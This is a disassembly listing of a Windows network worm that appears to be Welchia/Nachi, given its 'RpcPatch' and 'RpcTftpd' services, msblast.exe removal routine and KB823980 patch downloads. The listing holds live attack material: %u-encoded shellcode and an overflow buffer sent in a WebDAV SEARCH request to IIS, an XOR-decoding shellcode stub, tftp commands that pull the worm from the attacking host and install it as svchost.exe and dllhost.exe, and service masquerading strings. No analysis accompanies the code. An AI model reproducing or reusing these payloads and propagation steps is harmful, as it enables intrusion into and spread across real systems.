dword_4040C0	dd 7C80929Ch	; resolved to->KERNEL32.GetTickCount					; sub_401B90+4Cr ...
dword_4040C4	dd 7C810637h	; resolved to->KERNEL32.CreateThread					; sub_401470+F9r ...
dword_4040C8	dd 7C802442h	; resolved to->KERNEL32.Sleep					; sub_401280+6Cr ...
dword_4040CC	dd 7C87109Dh	; resolved to->KERNEL32.FreeConsoledword_4040D0	dd 7C814EEAh	; resolved to->KERNEL32.GetSystemDirectoryAdword_4040D4	dd 7C864B0Fh	; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_4040D8	dd 7C863DE5h	; resolved to->KERNEL32.Process32Firstdword_4040DC	dd 7C863F58h	; resolved to->KERNEL32.Process32Nextdword_4040E0	dd 7C809B47h	; resolved to->KERNEL32.CloseHandle					; sub_401000+E1r ...
dword_4040E4	dd 7C802367h	; resolved to->KERNEL32.CreateProcessAdword_4040E8	dd 7C831EABh	; resolved to->KERNEL32.DeleteFileA					; sub_401780+1D3r ...
		align 10h
dword_4040F0	dd 77C39E7Eh	; resolved to->MSVCRT.exitdword_4040F4	dd 77C32DAEh	; resolved to->MSVCRT._XcptFilterdword_4040F8	dd 77C1EEEBh	; resolved to->MSVCRT.__getmainargsdword_4040FC	dd 77C39D67h	; resolved to->MSVCRT._inittermdword_404100	dd 77C47C60h	; resolved to->MSVCRT.strstr					; sub_401B90+80r ...
dword_404104	dd 77C371BCh	; resolved to->MSVCRT.sranddword_404108	dd 77C29CC5h	dword_40410C	dd 77C1F1F1h	; resolved to->MSVCRT.__p___initenvdword_404110	dd 77C4D675h	; resolved to->MSVCRT.__setusermatherrdword_404114	dd 77C623D8h	; resolved to->MSVCRT._adjust_fdivdword_404118	dd 77C1F1A4h	; resolved to->MSVCRT.__p__commodedword_40411C	dd 77C3F931h	; resolved to->MSVCRT.sprintf					; sub_4015E0+Er ...
dword_404120	dd 77C47BE0h	; resolved to->MSVCRT.strrchrdword_404124	dd 77C1F1DBh	; resolved to->MSVCRT.__p__fmodedword_404128	dd 77C3537Ch	; resolved to->MSVCRT.__set_app_typedword_40412C	dd 77C35C94h	; resolved to->MSVCRT._except_handler3dword_404130	dd 77C4EE2Fh	; resolved to->MSVCRT._controlfpdword_404134	dd 77C39E9Ah	; resolved to->MSVCRT._exitdword_404138	dd 77C29CDDh	dword_40413C	dd 77C371D3h	; resolved to->MSVCRT.rand					; sub_401280+12Br ...
dword_404140	dd 77C4624Eh	; resolved to->MSVCRT._stricmp					; sub_4023E0+64r
		align 8
dword_404148	dd 7E45A045h	; resolved to->USER32.ExitWindowsEx		align 10h
dword_404150	dd 71AB3B91h	; resolved to->WS2_32.socket					; sub_402B20+57r ...
dword_404154	dd 71AB406Ah	; resolved to->WS2_32.connect					; sub_402C40+6Er ...
dword_404158	dd 71AB50C8h	; resolved to->WS2_32.gethostnamedword_40415C	dd 71AB3F41h	; resolved to->WS2_32.inet_ntoa					; sub_402C40+7Er
dword_404160	dd 71AB4FD4h	; resolved to->WS2_32.gethostbyname					; sub_401EA0+1Br
dword_404164	dd 71AB3EA1h	; resolved to->WS2_32.setsockopt					; sub_401C80+41r ...
dword_404168	dd 71AB428Ah	; resolved to->WS2_32.send					; sub_401B90+1Er ...
dword_40416C	dd 71AB615Ah	; resolved to->WS2_32.recv					; sub_401B90+65r ...
dword_404170	dd 71AB9639h	; resolved to->WS2_32.closesocket					; sub_401990+15Dr ...
dword_404174	dd 71AB2B66h	; resolved to->WS2_32.ntohs					; sub_4020E0+7r ...
dword_404178	dd 71AB3E00h	; resolved to->WS2_32.binddword_40417C	dd 71AB4428h	; resolved to->WS2_32.WSACleanupdword_404180	dd 71AB88D3h	; resolved to->WS2_32.listendword_404184	dd 71AC1028h	; resolved to->WS2_32.accept					; sub_401990+137r
dword_404188	dd 71AB2BC0h	; resolved to->WS2_32.ntohl					; sub_401990+20r
dword_40418C	dd 71AB664Dh	; resolved to->WS2_32.WSAStartupdword_404190	dd 71AB2BC0h	; resolved to->WS2_32.ntohldword_404194	dd 71AB2BF4h	; resolved to->WS2_32.inet_addr					; sub_4020E0+27r ...
		dd 0
dword_40419C	dd 42D779A3h			dd 2 dup(0)
dword_4041A8	dd 0FFFFFFFFh, 4030BCh,	4030D0h, 393h dup(0)dword_405000	dd 0		dword_405004	dd 0		dword_405008	dd 0		dword_40500C	dd 0		aU5390U665eU66a	db '%u5390%u665e%u66ad%u993d%u7560%u56f8%u5656%u665f%u66ad%u4e3d%u740'
					; DATA XREF: sub_401F30+A4o
		db '0%u9023%u612c%u5090%u6659%u90ad%u612c%u548d%u7088%u548d%u908a%u54'
		db '8d%u708a%u548d%u908a%u5852%u74aa%u75d8%u90d6%u5058%u5050%u90c3%u6'
		db '099',0
		align 4
aFfilomidomfafd	db 'ffilomidomfafdfgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpai'
					; DATA XREF: sub_401F30+C6o
		db 'nlnpeppppppgekbaaaaaaaaijehaigeijdnaaaaaaaamhefpeppppppppilefpaid'
		db 'oiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaolagibmgaaeaaaaailagdne'
		db 'oeoeoeohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfjfihfokppog'
		db 'olpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoih'
		db 'hppppppcececece',0
		align 10h
aU5951U6858U759	db '%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759'
					; DATA XREF: sub_401F30+45o
		db 'f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u68'
		db '58%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018',0
		align 4
a?xmlVersion1_0	db '<?xml version="1.0"?>',0Dh,0Ah
		db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
		db '<g:sql>',0Dh,0Ah
		db 'Select "DAV:displayname" from scope()',0Dh,0Ah
		db '</g:sql>',0Dh,0Ah
		db '</g:searchrequest>',0Dh,0Ah,0
word_40537C	dw 3D30h		; DATA XREF: sub_401280+19Dr
		dw 3D9Fh
		dd 3D8B3D8Ah, 3D953D91h, 3D9D3D97h, 3DBC3DA1h, 3DE93DF3h
		dd 0DCA03D9Ah, 0CA64CA60h, 0CA68CA67h, 0CA71CA66h, 0CB5DCA82h
		dd 0CBD0CA62h, 0D20CCBCFh, 0D235D22Ah, 0D344D248h, 0D354D357h
		dd 0D360D35Ch, 0D353D362h, 0D3A1D35Fh, 0D3A3D3A2h, 0D39CD390h
		dd 0DA6DD39Eh, 0DA05DA04h, 0DA47DA11h, 0DA6ADA00h, 0DB91DAC7h
		dd 0DA06DA08h, 0DA58DA3Fh, 0DA45DA59h, 0DA4BDA3Fh, 0DA68DA55h
		dd 0DB8ADAC5h, 0DBEADBDEh, 0DCA0DC6Dh, 0DC75DCA3h, 0DCB9DCA2h
		dd 0DC71DCBAh, 0DCA6DC70h
off_405414	dd offset aHttpDownload_m ; DATA XREF: sub_401780:loc_4018AFr
					; "http://download.microsoft.com/download/"...
		dd offset aHttpDownload_1 ; "http://download.microsoft.com/download/"...
		dd offset aHttpDownload_2 ; "http://download.microsoft.com/download/"...
		dd offset aHttpDownload_3 ; "http://download.microsoft.com/download/"...
off_405424	dd offset aHttpDownload_0 ; DATA XREF: sub_401780+120r
					; "http://download.microsoft.com/download/"...
		dd offset aHttpDownload_4 ; "http://download.microsoft.com/download/"...
		dd offset aHttpDownload_5 ; "http://download.microsoft.com/download/"...
		dd offset aHttpDownload_6 ; "http://download.microsoft.com/download/"...
dword_405434	dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0		dd 1, 10001h, 1A0h, 0
		dd 0C0h, 46000000h, 0
		dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2
dword_40547C	dd 3000005h, 10hdword_405484	dd 3E8h				dd 0E5h, 3D0h, 40001h, 60005h, 1, 0
		dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
		dd 1, 0
		dd 0D5E70h, 2, 0D5E7Ch,	0
		dd 10h,	0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
		dd 4252414Dh, 1, 0
		dd 0BAADF00Dh, 0
		dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
		dd 0C0h, 46000000h, 338h, 0
		dd 0C0h, 46000000h, 0
		dd 330h, 328h, 0
		dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh,	328h, 0D8h, 0
		dd 2, 7, 4 dup(0)
		dd 0CD28C4h, 0CD2964h, 0
		dd 7, 1B9h, 0
		dd 0C0h, 46000000h, 1ABh, 0
		dd 0C0h, 46000000h, 1A5h, 0
		dd 0C0h, 46000000h, 1A6h, 0
		dd 0C0h, 46000000h, 1A4h, 0
		dd 0C0h, 46000000h, 1ADh, 0
		dd 0C0h, 46000000h, 1AAh, 0
		dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h,	78h, 30h
		dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
		dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
		dd 0C0h, 46000000h, 10h, 2 dup(0)
		dd 1, 0
		dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
		dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
		dd 4 dup(0)
		dd 144318h, 0
		dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
		dd 0C0h, 46000000h, 33Bh, 0
		dd 0C0h, 46000000h, 0
		dd 30h,	10001h,	317C581h, 4AE90E80h, 8AF19999h,	857A6F50h
		dd 2, 5	dup(0)
		dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h,	0
		dd 0DDAD8h, 2 dup(0)
		dd 0C2F20h, 2 dup(0)
		dd 3, 0
		dd 3, 580046h, 0
		dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
		dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh,	0B8B68h, 2, 2 dup(0)
dword_4057DC	dd 20h							; sub_402170+29w
dword_4057E0	dd 0		dword_4057E4	dd 20h							; sub_402170+2Ew
dword_4057E8	dd 5C005Ch	aC1234561111111:			; DATA XREF: sub_402170+7Bo
		unicode	0, <\C$\123456111111111111111.doc>,0
aFxnbfxfxnbfxfx:			; DATA XREF: sub_402170+55o
		unicode	0, <FXNBFXFXNBFXFXFXFX>
dword_40584C	dd 7F08321Ah			db 0CCh
		db 0E0h, 0FDh, 7Fh
		db 0CCh
		db 0E0h, 0FDh, 7Fh
		db 126h	dup(90h)
; ---------------------------------------------------------------------------


loc_40597E:				; DATA XREF: sub_401F30+13Co
		jmp	short loc_405990

; =============== S U B	R O U T	I N E =======================================



sub_405980	proc far		; CODE XREF: sub_405980:loc_405990p
		pop	edx
		dec	edx
		xor	ecx, ecx
		mov	cx, 176h


loc_405988:				; CODE XREF: sub_405980+Cj
		xor	byte ptr [edx+ecx], 99h
		loop	loc_405988
		jmp	short loc_405995
; ---------------------------------------------------------------------------


loc_405990:				; CODE XREF: seg000:loc_40597Ej
		call	near ptr sub_405980


loc_405995:				; CODE XREF: sub_405980+Ej
		jo	short loc_4059F8
		cdq
		cdq
		cdq
		retn
; ---------------------------------------------------------------------------
		db 21h
		dd 0E6646995h, 0E9129912h, 0D9123485h, 12411291h, 6A9AA5EAh
		dd 9AE1EF12h, 0B9E7126Ah, 0D712629Ah, 0CF74AA8Dh, 0A612C8CEh
		dd 6B12629Ah, 6AC097F3h, 0C091ED3Fh, 9D5E1AC6h,	0C0707BDCh
		dd 5412C7C6h, 9ABDDF12h, 9A78485Ah, 0FF50AA58h,	0DF129112h
		dd 585A9A85h, 589A9B78h, 5A9A9912h
; ---------------------------------------------------------------------------


loc_4059F8:				; CODE XREF: sub_405980:loc_405995j
		adc	ah, [ebx+12h]
		outsb
		sbb	bl, [edi-69h]
		adc	cl, [ecx-0Dh]
		call	far ptr	9999h:99ED71C0h
		sbb	bl, [edi-6Ch]
		retf
sub_405980	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0CFh, 66h, 0CEh
		dd 4112C365h, 71C09AF3h, 999999F8h, 12DD751Ah, 0C089F36Dh
		dd 7B179D10h, 0C9C9C962h, 0F398F3C9h, 6DCE669Bh, 0C7104112h
		dd 0A5C710A1h, 0FFD9C710h, 98B5DF5Eh, 89DE1498h, 59AACFC9h
		dd 0F3C9C9C9h, 14C9C998h, 9B5EA5CEh, 99FDF4FAh,	0CE66C9CBh
		dd 9B9E5E71h, 5E9B9999h, 0FAFA9DDEh, 89F3FAFAh,	0CE66CACEh
		dd 0CE66CA61h, 0CE66C965h, 3559AA75h, 60EC591Ch, 0CACFCBC8h
		dd 0C0C34B66h, 0AA777B32h, 9A715A59h, 0DE666666h, 0EBC9EDFCh
		dd 0FDD8FAF6h, 0EAFCEBFDh, 0EBDA99EAh, 0FCEDF8FCh, 0FAF6EBC9h
		dd 0D8EAEAFCh, 0F0E1DC99h, 0EBF1CDEDh, 99FDF8FCh, 0FDF8F6D5h
		dd 0EBFBF0D5h, 0D8E0EBF8h, 0ABEAEE99h, 99ABAAC6h, 0CAD8CACEh
		dd 0FCF2FAF6h, 0FA99D8EDh, 0FCF7F7F6h, 0FA99EDFAh, 0FCEAF6F5h
		dd 0F2FAF6EAh, 99EDFCh
dword_405AF4	dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0		dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 0
		dd offset aILoveMyWifeBab ; "=========== I love	my wife	& baby :)~~~"...
aCopyDllcacheTf	db 'copy dllcache\tftpd.exe wins\svchost.exe',0Ah
					; DATA XREF: sub_401C80+175o
		db 0Dh,0
		align 4
aWinsDllhost_ex	db 'wins\DLLHOST.EXE',0Ah ; DATA XREF: sub_401C80+1ABo
					; sub_401C80+1BDo
		db 0Dh,0
		align 4
word_405B68	dw 29Ah			; DATA XREF: sub_401990+5Aw
					; sub_401990+81r ...
		align 4
aRpctftpd	db 'RpcTftpd',0         ; DATA XREF: sub_401280+41o
					; sub_401280+E7o ...
		align 4
aRpcpatch	db 'RpcPatch',0         ; DATA XREF: sub_401280+37o
					; sub_401660+57o ...
		align 4
aDirDllcacheTft	db 'dir dllcache\tftpd.exe',0Ah ; DATA XREF: sub_401C80+11Bo
		db 0Dh,0
		align 10h
dword_405BA0	dd 4							; sub_402880:loc_4028F6r
byte_405BA4	db 3Dh			; DATA XREF: sub_401100:loc_40115Ar
		db 3Dh,	2 dup(0CAh)
		dd 0D2D2CBCAh, 0DADAD3D3h, 0DCDBh
aDirWinsDllhost	db 'dir wins\dllhost.exe',0Ah ; DATA XREF: sub_401C80+D2o
		db 0Dh,0
		align 4
aGetHttp1_1Acce	db 'GET / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_402C40+B5o
		db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*',0Dh
		db 0Ah
		db 'User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',0Dh,0Ah
		db 'Host: ',0
		align 4
aConnectionKeep	db 0Dh,0Ah		; DATA XREF: sub_402C40+95o
		db 'Connection: Keep-Alive',0Dh,0Ah
		db 0Dh,0Ah,0
		align 4
aILoveMyWifeBab	db '=========== I love my wife & baby :)~~~  Welcome Chian~~~  Notice'
					; DATA XREF: seg000:00405B24o
		db ':  2004 will remove myself:)~~ sorry zhongli~~~===========  wins',0
		align 4
aHttpDownload_6	db 'http://download.microsoft.com/download/6/9/5/6957d785-fb7a-4ac9-b'
					; DATA XREF: seg000:00405430o
		db '1e6-cb99b62f9f2a/Windows2000-KB823980-x86-KOR.exe',0
		align 4
aHttpDownload_5	db 'http://download.microsoft.com/download/5/8/f/58fa7161-8db3-4af4-b'
					; DATA XREF: seg000:0040542Co
		db '576-0a56b0a9d8e6/Windows2000-KB823980-x86-CHT.exe',0
		align 10h
aHttpDownload_4	db 'http://download.microsoft.com/download/2/8/1/281c0df6-772b-42b0-9'
					; DATA XREF: seg000:00405428o
		db '125-6858b759e977/Windows2000-KB823980-x86-CHS.exe',0
		align 4
aHttpDownload_0	db 'http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8'
					; DATA XREF: seg000:off_405424o
		db 'ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe',0
		align 4
aHttpDownload_3	db 'http://download.microsoft.com/download/e/3/1/e31b9d29-f650-4078-8'
					; DATA XREF: seg000:00405420o
		db 'a76-3e81eb4554f6/WindowsXP-KB823980-x86-KOR.exe',0
		align 4
aHttpDownload_2	db 'http://download.microsoft.com/download/2/3/6/236eaaa3-380b-4507-9'
					; DATA XREF: seg000:0040541Co
		db 'ac2-6cec324b3ce8/WindowsXP-KB823980-x86-CHT.exe',0
		align 10h
aHttpDownload_1	db 'http://download.microsoft.com/download/a/a/5/aa56d061-3a38-44af-8'
					; DATA XREF: seg000:00405418o
		db 'd48-85e42de9d2c0/WindowsXP-KB823980-x86-CHS.exe',0
		align 4
aHttpDownload_m	db 'http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-a'
					; DATA XREF: seg000:off_405414o
		db 'aee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe',0
		align 4
aTftpISGetSvcho	db 'tftp -i %s get svchost.exe wins\SVCHOST.EXE',0Ah
					; DATA XREF: sub_401210+48o
		db 0Dh,0
		align 4
aTftpISGetDllho	db 'tftp -i %s get dllhost.exe wins\DLLHOST.EXE',0Ah
					; DATA XREF: sub_401210+34o
		db 0Dh,0
		align 4
aNetworkConnect	db 'Network Connections Sharing',0 ; DATA XREF: sub_4015E0+57o
aSvchost_exe	db 'svchost.exe',0      ; DATA XREF: sub_4015E0+52o
					; sub_4023E0+59o
aMsdtc		db 'MSDTC',0            ; DATA XREF: sub_4015E0+4Do
		align 4
aSWinsSvchost_e	db '%s\wins\svchost.exe',0 ; DATA XREF: sub_4015E0+2Do
aSDllcacheTftpd	db '%s\dllcache\tftpd.exe',0 ; DATA XREF: sub_4015E0+19o
		align 4
aWinsClient	db 'WINS Client',0      ; DATA XREF: sub_401660+52o
aDllhost_exe	db 'DLLHOST.EXE',0      ; DATA XREF: sub_401660+4Do
					; sub_401C80+ECo
aBrowser	db 'Browser',0          ; DATA XREF: sub_401660+48o
aSWinsDllhost_e	db '%s\wins\DLLHOST.EXE',0 ; DATA XREF: sub_401660+24o
aSNOZQ		db '%s -n -o -z -q',0   ; DATA XREF: sub_401780+15Co
		align 4
dword_4061A8	dd 53637052h	dword_4061AC	dd 69767265h	dword_4061B0	dd 61506563h	dword_4061B4	dd 652E6B63h	word_4061B8	dw 6578h		; DATA XREF: sub_401780+102r
byte_4061BA	db 0			; DATA XREF: sub_401780+10Dr
		align 4
dword_4061BC	dd 74737973h, 32336D65h, 3Eh					; sub_401C80+8Eo ...
aTimeoutOccurre	db 'Timeout occurred',0 ; DATA XREF: sub_401B90+95o
		align 4
aTransferSucces	db 'Transfer successful',0 ; DATA XREF: sub_401B90+86o
aTftpd_exe	db 'TFTPD.EXE',0        ; DATA XREF: sub_401C80+148o
		align 4
aTftpd_exe_0	db 'tftpd.exe',0        ; DATA XREF: sub_401C80+135o
		align 4
aDllhost_exe_0	db 'dllhost.exe',0      ; DATA XREF: sub_401C80+103o
aMicrosoftWindo	db 'Microsoft Windows',0 ; DATA XREF: sub_401C80+77o
		align 4
aMicrosoft_com	db 'microsoft.com',0    ; DATA XREF: sub_401E80o
		align 4
word_406238	dw 0A0Dh		; DATA XREF: sub_401F30+17Er
byte_40623A	db 0			; DATA XREF: sub_401F30+185r
		align 4
aHttp1_1Host127	db ' HTTP/1.1',0Dh,0Ah  ; DATA XREF: sub_401F30+100o
		db 'Host: 127.0.0.1',0Dh,0Ah
		db 'Content-Type: text/xml',0Dh,0Ah
		db 'Content-length: 377',0Dh,0Ah
		db 0Dh,0Ah
		db 'YXYX',0
aSearch		db 'SEARCH /',0         ; DATA XREF: sub_401F30+Ao
		align 4
aSeshutdownpriv	db 'SeShutdownPrivilege',0 ; DATA XREF: sub_4022A0+1Co
aSoftwareMicr_1	db 'SOFTWARE\Microsoft\Updates\Windows XP\SP2\KB823980',0
					; DATA XREF: sub_402390+2Do
		align 10h
aSoftwareMicr_0	db 'SOFTWARE\Microsoft\Updates\Windows XP\SP1\KB823980',0
					; DATA XREF: sub_402390:loc_4023ACo
		align 4
aSoftwareMicros	db 'SOFTWARE\Microsoft\Updates\Windows 2000\SP5\KB823980',0
					; DATA XREF: sub_402390+8o
		align 4
aManagesNetwork	db 'Manages network configuration by updating DNS names IP address.',0
					; DATA XREF: sub_4023E0+D1o
aSWinsS		db '%s\wins\%s',0       ; DATA XREF: sub_4023E0+4Do
		align 4
aDSWins		db '-d%s\wins',0        ; DATA XREF: sub_402540+33o
		align 4
aRpcpatch_mutex	db 'RpcPatch_Mutex',0   ; DATA XREF: sub_4027B0o
		align 4
aSMsblast_exe	db '%s\msblast.exe',0   ; DATA XREF: sub_402A00+63o
		align 4
aMsblast	db 'msblast',0          ; DATA XREF: sub_402A00+8o
a411		db '411',0              ; DATA XREF: sub_402C40+20Ao
aSearchHttp1_1H	db 'SEARCH / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_402C40+19Eo
		db 'Host: %s',0Dh,0Ah
		db 0Dh,0Ah,0
aServerMicrosof	db 'Server: Microsoft-IIS/5.0',0 ; DATA XREF: sub_402C40+13Fo
		align 4
aSSS		db '%s%s%s',0           ; DATA XREF: sub_402C40+BAo
		align 4
dword_406414	dd 1				align 10h
dword_406420	dd 0							; sub_402B20+CAr
dword_406424	dd 0							; sub_401F30+50r ...
dword_406428	dd 0							; sub_402170+100w
dword_40642C	dd 0							; sub_4020E0+13r
dword_406430	dd 10h dup(0)						; sub_402AB0+3Fo ...
dword_406470	dd 0							; sub_402130+35w ...
		align 8
dword_406478	dd 0				align 10h
dword_406480	dd 0							; sub_402170+C7w
		dd 1Bh dup(0)
dword_4064F0	dd 0							; sub_402170+D3w
dword_4064F4	dd 0							; sub_402170+DFw
		dd 0Bh dup(0)
dword_406524	dd 0							; sub_402170+EFw
dword_406528	dd 0							; sub_402170+F9w
		dd 5 dup(0)
dword_406540	dd 0							; sub_402170+11Ew
		dd 2Eh dup(0)
dword_4065FC	dd 0							; sub_402170+124w
		dd 74h dup(0)
dword_4067D0	dd 0		dword_4067D4	dd 0		dword_4067D8	dd 0		dword_4067DC	dd 0		dword_4067E0	dd 0B3h	dup(0)	dword_406AAC	dd 0Fh dup(0)	dword_406AE8	dd 146h	dup(0)	seg000		ends

; Section 2. (virtual address 00007000)
; Virtual size			: 00003000 (  12288.)
; Section size in file		: 00003000 (  12288.)
; Offset to raw	data for section: 00007000
; Flags	E0000040: Data Executable Readable Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
seg001		segment	para public 'CODE' use32
		assume cs:seg001
		;org 407000h
		assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_407000	dd 11Ch	dup(0)	dword_407470	dd 0							; sub_4020E0+33r
dword_407474	dd 0							; sub_402170+10Aw
dword_407478	dd 8 dup(0)						; sub_401210+43o ...
aCWindowsSystem	db 'C:\WINDOWS\system32',0 ; DATA XREF: sub_4011C0+14o
					; sub_4015E0+14o ...
		dd 3Dh dup(0)
dword_4075A0	dd 0							; sub_401280+9Cr ...
dword_4075A4	dd 0							; sub_401470+136r ...
dword_4075A8	dd 20h dup(0)						; sub_401C80+18Co
dword_407628	dd 20h dup(0)						; sub_401C80+15Co
dword_4076A8	dd 0							; seg000:00402932w
dword_4076AC	dd 0		dword_4076B0	dd 0		dword_4076B4	dd 0		dword_4076B8	dd 0		dword_4076BC	dd 0FFFFFFFFh	dword_4076C0	dd 0FFFFFFFFh	dword_4076C4	dd 0				dd 24Eh	dup(0)
		dd 0E0h, 3060h,	74654701h, 7473614Ch, 6F727245h, 49010072h
		dd 7265746Eh, 6B636F6Ch, 65446465h, 6D657263h, 746E65h
		dd 6F6C4701h, 416C6162h, 636F6C6Ch, 6C470100h, 6C61626Fh
		dd 65657246h, 704F0100h, 72506E65h, 7365636Fh, 47010073h
		dd 69467465h, 7441656Ch, 62697274h, 73657475h, 53010041h
		dd 69467465h, 7441656Ch, 62697274h, 73657475h, 47010041h
		dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 6D6E5501h
		dd 69567061h, 664F7765h, 656C6946h, 72430100h, 65746165h
		dd 6574754Dh, 1004178h,	65746E49h, 636F6C72h, 4964656Bh
		dd 6572636Eh, 746E656Dh, 6F4C0100h, 416C6163h, 636F6C6Ch
		dd 6F4C0100h, 466C6163h, 656572h, 74654701h, 73726556h
		dd 6E6F69h, 74654701h, 73726556h, 456E6F69h, 1004178h
		dd 43746547h, 65727275h, 7250746Eh, 7365636Fh, 47010073h
		dd 454F7465h, 50434Dh, 74654701h, 74737953h, 65446D65h
		dd 6C756166h, 49434C74h, 47010044h, 6F4D7465h, 656C7564h
		dd 656C6946h, 656D614Eh, 54010041h, 696D7265h, 6574616Eh
		dd 636F7250h, 737365h, 69615701h, 726F4674h, 676E6953h
		dd 624F656Ch, 7463656Ah, 6F430100h, 69467970h, 41656Ch
		dd 74654701h, 61636F4Ch, 6D69546Ch, 45010065h, 50746978h
		dd 65636F72h, 1007373h,	54746547h, 436B6369h, 746E756Fh
		dd 72430100h, 65746165h, 65726854h, 1006461h, 65656C53h
		dd 46010070h, 43656572h, 6F736E6Fh, 100656Ch, 53746547h
		dd 65747379h, 7269446Dh, 6F746365h, 417972h, 65724301h
		dd 54657461h, 686C6F6Fh, 33706C65h, 616E5332h, 6F687370h
		dd 50010074h, 65636F72h, 32337373h, 73726946h, 50010074h
		dd 65636F72h, 32337373h, 7478654Eh, 6C430100h, 4865736Fh
		dd 6C646E61h, 43010065h, 74616572h, 6F725065h, 73736563h
		dd 44010041h, 74656C65h, 6C694665h, 4165h, 0EDh, 3000h
		dd 61684301h, 5365676Eh, 69767265h, 6F436563h, 6769666Eh
		dd 1004132h, 72657551h,	72655379h, 65636976h, 666E6F43h
		dd 41326769h, 74530100h, 53747261h, 69767265h, 416563h
		dd 6C654401h, 53657465h, 69767265h, 1006563h, 69676552h
		dd 72657473h, 76726553h, 43656369h, 486C7274h, 6C646E61h
		dd 417265h, 74655301h, 76726553h, 53656369h, 75746174h
		dd 53010073h, 74726174h, 76726553h, 43656369h, 446C7274h
		dd 61707369h, 65686374h, 1004172h, 72657551h, 72655379h
		dd 65636976h, 74617453h, 1007375h, 72657551h, 72655379h
		dd 65636976h, 666E6F43h, 416769h, 61684301h, 5365676Eh
		dd 69767265h, 6F436563h, 6769666Eh, 41010041h, 73756A64h
		dd 6B6F5474h, 72506E65h, 6C697669h, 73656765h, 704F0100h
		dd 43536E65h, 616E614Dh, 41726567h, 72430100h, 65746165h
		dd 76726553h, 41656369h, 6C430100h, 5365736Fh, 69767265h
		dd 61486563h, 656C646Eh, 704F0100h, 65536E65h, 63697672h
		dd 1004165h, 4F676552h,	4B6E6570h, 78457965h, 52010041h
		dd 6C436765h, 4B65736Fh, 1007965h, 6E65704Fh, 636F7250h
		dd 54737365h, 6E656B6Fh, 6F4C0100h, 70756B6Fh, 76697250h
		dd 67656C69h, 6C615665h, 416575h, 0FA00h, 305000h, 63490100h
		dd 6C43706Dh, 4865736Fh, 6C646E61h, 49010065h, 43706D63h
		dd 74616572h, 6C694665h, 49010065h, 53706D63h, 45646E65h
		dd 6F6863h, 10300h, 30F000h, 78650100h,	1007469h, 7063585Fh
		dd 6C694674h, 726574h, 675F5F01h, 616D7465h, 72616E69h
		dd 1007367h, 696E695Fh,	72657474h, 7301006Dh, 74737274h
		dd 73010072h, 646E6172h, 3F3F0100h, 41594032h, 49584150h
		dd 1005A40h, 5F705F5Fh,	6E695F5Fh, 6E657469h, 5F010076h
		dd 7465735Fh, 72657375h, 6874616Dh, 727265h, 64615F01h
		dd 7473756Ah, 6964665Fh, 5F010076h, 5F5F705Fh, 6D6D6F63h
		dd 65646Fh, 72707301h, 66746E69h, 74730100h, 68637272h
		dd 5F010072h, 5F5F705Fh, 646F6D66h, 5F010065h, 7465735Fh
		dd 7070615Fh, 7079745Fh, 5F010065h, 65637865h, 685F7470h
		dd 6C646E61h, 337265h, 6F635F01h, 6F72746Eh, 70666Ch, 78655F01h
		dd 1007469h, 40333F3Fh,	50584159h, 5A405841h, 61720100h
		dd 100646Eh, 7274735Fh,	706D6369h, 10E0000h, 319C0000h
		dd 55010000h, 6F444C52h, 6F6C6E77h, 6F546461h, 656C6946h
		dd 19000041h, 48000001h, 1000031h, 74697845h, 646E6957h
		dd 4573776Fh, 24000078h, 50000001h, 0FF000031h,	4FF0017h
		dd 39FF00h, 0FF000CFFh,	15FF0034h, 13FF00h, 0FF0010FFh
		dd 9FF0003h, 2FF00h, 0FF0074FFh, 1FF000Dh, 8FF00h, 0FF0073FFh
		dd 0BFF000Eh, 0
		dd 45500000h, 14C0000h,	20080003h, 9A08h, 0
		dd 0E00000h, 10B010Fh, 30000006h, 40000000h, 0
		dd 2FCC0000h, 10000000h, 40000000h, 0
		dd 10000040h, 10000000h, 40000h, 0
		dd 40000h, 0
		dd 80000000h, 10000000h, 0
		dd 30000h, 0
		dd 10000010h, 0
		dd 10000010h, 0
		dd 100000h, 2 dup(0)
		dd 41B40000h, 0A00000h,	14h dup(0)
		dd 40000000h, 1A40000h,	6 dup(0)
		dd 742E0000h, 747865h, 213A0000h, 10000000h, 30000000h
